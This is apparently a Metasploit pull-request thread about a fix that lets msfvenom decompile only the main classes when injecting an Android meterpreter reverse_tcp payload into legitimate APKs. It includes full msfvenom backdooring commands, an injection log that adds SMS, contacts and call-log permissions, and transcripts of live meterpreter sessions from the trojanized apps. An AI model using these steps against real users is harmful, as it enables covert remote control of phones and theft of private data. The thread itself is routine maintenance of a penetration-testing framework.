Msf::Payload::Apk: apktool: Decompile only main classes

[bcoles]

@timwr

Fixes #17631

Tested using:

• https://www.apkmirror.com/apk/samsung-electronics-co-ltd/samsung-internet-for-android/samsung-internet-for-android-11-0-00-73-release/samsung-internet-browser-11-0-00-73-android-apk-download/

I've tested that these changes allow the APK to be decompiled and rebuilt successfully, but haven't done any further testing (does the payload still work? is there any reason why would ever want to decompile other DEX files?).

Before

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.7.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling assets/A3AEECD8.dex...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_tab_n_badge_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_action_bar_background_divider_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_section_divider_default_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-desk-mdpi-v8/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-tvdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
	at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
	at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
	at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
	at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
	at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:103)
	at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
	at brut.apktool.Main.cmdDecode(Main.java:175)
	at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed

After

# bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
/usr/lib/x86_64-linux-gnu/ruby/3.0.0/stringio.so: warning: already initialized constant StringIO::VERSION
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.sec.android.app.sbrowser.husvm
[*] Loading /tmp/d20230220-2705253-uvqwjj/original/smali/com/sec/android/app/sbrowser/SBrowserApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Aligning /tmp/d20230220-2705253-uvqwjj/output.apk
[*] Signing /tmp/d20230220-2705253-uvqwjj/aligned.apk with apksigner
Payload size: 76491245 bytes
Saved as: asdf.apk

[jmartin-tech]

Not a blocker, A question that comes to mind is what versions or apktool support this flag?

[bcoles]

The flag has been supported since at least Nov 16, 2019. The flag was available prior, but had some bugs. (iBotPeaches/Apktool#2226)

Version 2.4.1 was released not long after (Nov 30, 2019) and should support this flag:

https://github.com/iBotPeaches/Apktool/releases/tag/v2.4.1

Metasploit requires apktool version 2.0.1 at minimum and raises a warning for version 2.5.1 and prior.

metasploit-framework/lib/msf/core/payload/apk.rb

Lines 242 to 248 in fbf2e5d

	apk_v = Rex::Version.new(check_apktool.split("\n").first.strip)
	unless apk_v >= Rex::Version.new('2.0.1')
	raise RuntimeError, "apktool version #{apk_v} not supported, please download at least version 2.0.1."
	end
	unless apk_v >= Rex::Version.new('2.5.1')
	print_warning("apktool version #{apk_v} is outdated and may fail to decompile some apk files. Update apktool to the latest version.")
	end

This change requires the minimum version to be bumped to 2.4.1.

[bcoles]

Updated minimum required version to 2.4.1.

[gwillcox-r7]

Before:

 ~/git/metasploit-framework │ master ?31  bundle exec ./msfvenom -x 'com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk' -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
Using APK template: com.sec.android.app.sbrowser_11.0.00.73-1100073500_minAPI21(armeabi-v7a)(nodpi)_apkmirror.com.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[-] I: Using Apktool 2.7.0 on original.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/gwillcox/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Baksmaling classes2.dex...
I: Baksmaling assets/A3AEECD8.dex...
W: Cant find 9patch chunk in file: "drawable-desk-mdpi-v8/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_section_divider_default_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_tab_n_badge_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-tvdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable/sesl_action_bar_background_divider_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-hdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_switch_track_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_index_bar_bg.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-mdpi-v4/sesl_btn_switch_mtrl.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxxhdpi-v4/sesl_spinner_picker_alpha.9.png". Renaming it to *.png.
W: Cant find 9patch chunk in file: "drawable-xxhdpi-v4/sesl_toast_frame_alpha.9.png". Renaming it to *.png.
Exception in thread "main" org.jf.dexlib2.dexbacked.DexBackedDexFile$NotADexFile: Not a valid dex magic value: cf 77 4c c7 9b 21 01 cd
        at org.jf.dexlib2.util.DexUtil.verifyDexHeader(DexUtil.java:93)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.getVersion(DexBackedDexFile.java:157)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:81)
        at org.jf.dexlib2.dexbacked.DexBackedDexFile.<init>(DexBackedDexFile.java:184)
        at org.jf.dexlib2.dexbacked.ZipDexContainer$1.getDexFile(ZipDexContainer.java:181)
        at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:89)
        at brut.androlib.src.SmaliDecoder.decode(SmaliDecoder.java:37)
        at brut.androlib.Androlib.decodeSourcesSmali(Androlib.java:103)
        at brut.androlib.ApkDecoder.decode(ApkDecoder.java:151)
        at brut.apktool.Main.cmdDecode(Main.java:175)
        at brut.apktool.Main.main(Main.java:79)
Error: apktool execution failed

[gwillcox-r7]

For what its worth the application appears to be resigned with the backdoor and I can successfully install the application on a target device and the app operates successfully though I haven't confirmed if the reverse shell works successfully, which may be in part to me not setting up the TCP port forwards correctly. Good to know it isn't affecting the apps install though.

[bcoles]

Tested successfully in emulator on Pixel_4_API_30. Installed and received a session.

msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : localhost
OS              : Android 11 - Linux 5.4.61-android11-0-00791-gbad091cc4bf3-ab6833933 (armv7l)
Architecture    : armv7l
System Language : en_US
Meterpreter     : dalvik/android
meterpreter > getuid
Server username: u0_a156
meterpreter > pwd
/data/user/0/com.sec.android.app.sbrowser/files

I tried a few other devices in emulator, but installation failed. I'm fairly sure that's to do with this specific APK, and not due to the changes introduced in this PR.

I also tested com.dotgears.flappybird.apk in emulator on Nexus_10_API_31 and verified that the changes did not break injection with this APK. This is a known good APK I've used to test msfvenom APK injection on emulated devices previously.

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : localhost
OS              : Android 11 - Linux 5.4.61-android11-0-00791-gbad091cc4bf3-ab6833933 (i686)
Architecture    : x86
System Language : en_US
Meterpreter     : dalvik/android
meterpreter > getuid
Server username: u0_a154
meterpreter > pwd
/data/user/0/com.dotgears.flappybird/files

[gwillcox-r7]

Alright given all the information that has been posted to this thread and the tests that have been conducted so far, I think this should be good to land. If we need to roll this back later we can always do so should things suddenly start breaking on edge cases or similar, but given tests above I'm fairly confident that this should be okay in its current state.

[gwillcox-r7]

Release Notes

lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.